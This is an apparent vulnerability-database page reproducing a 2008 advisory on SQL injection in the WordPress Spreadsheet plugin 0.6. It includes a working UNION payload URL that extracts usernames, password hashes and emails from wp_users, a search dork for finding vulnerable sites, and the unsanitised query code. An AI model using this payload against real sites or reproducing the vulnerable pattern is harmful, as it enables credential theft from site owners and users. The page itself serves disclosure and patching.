Standart SQL-Injection in Spreadsheet

vendor:

Spreadsheet

by:

1ten0.0net1

7.5

CVSS

HIGH

SQL-Injection

CWE

Product Name: Spreadsheet

Affected Version From: 0.6

Affected Version To: 0.6

Patch Exists: YES

Related CWE: N/A

CPE: a:timrohrer:spreadsheet

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Wordpress

2008

Standart SQL-Injection in Spreadsheet <= 0.6 Plugin

There is a standart SQL-Injection vulnerability in the Wordpress Plugin Spreadsheet <= 0.6. The vulnerability is triggered when the ss_load.php script is called with a malicious ss_id parameter. This can allow an attacker to execute arbitrary SQL queries on the underlying database, potentially leading to the disclosure of sensitive information. The vulnerable code is located in the ss_load.php and ss_functions.php scripts.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the plugin.

Source

Exploit-DB raw data:

===========================================
There's standart sql-injection in Spreadsheet <= 0.6 Plugin
# Author : 1ten0.0net1
# Script : Wordpress Plugin Spreadsheet <= 0.6 v.
# Download : http://timrohrer.com/blog/?page_id=71
# BUG :  Remote SQL-Injection Vulnerability
# Dork : inurl:/wp-content/plugins/wpSS/
Example:
http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain
===========================================
Vulnerable code:
ss_load.php
    $id = $_GET['ss_id'];
....
ss_functions.php:
function ss_load ($id, $plain=FALSE) {
....
    if ($wpdb->query("SELECT * FROM $table_name WHERE id='$id'") == 0) {
....

==> Visit us @ forum.antichat.ru

# milw0rm.com [2008-04-22]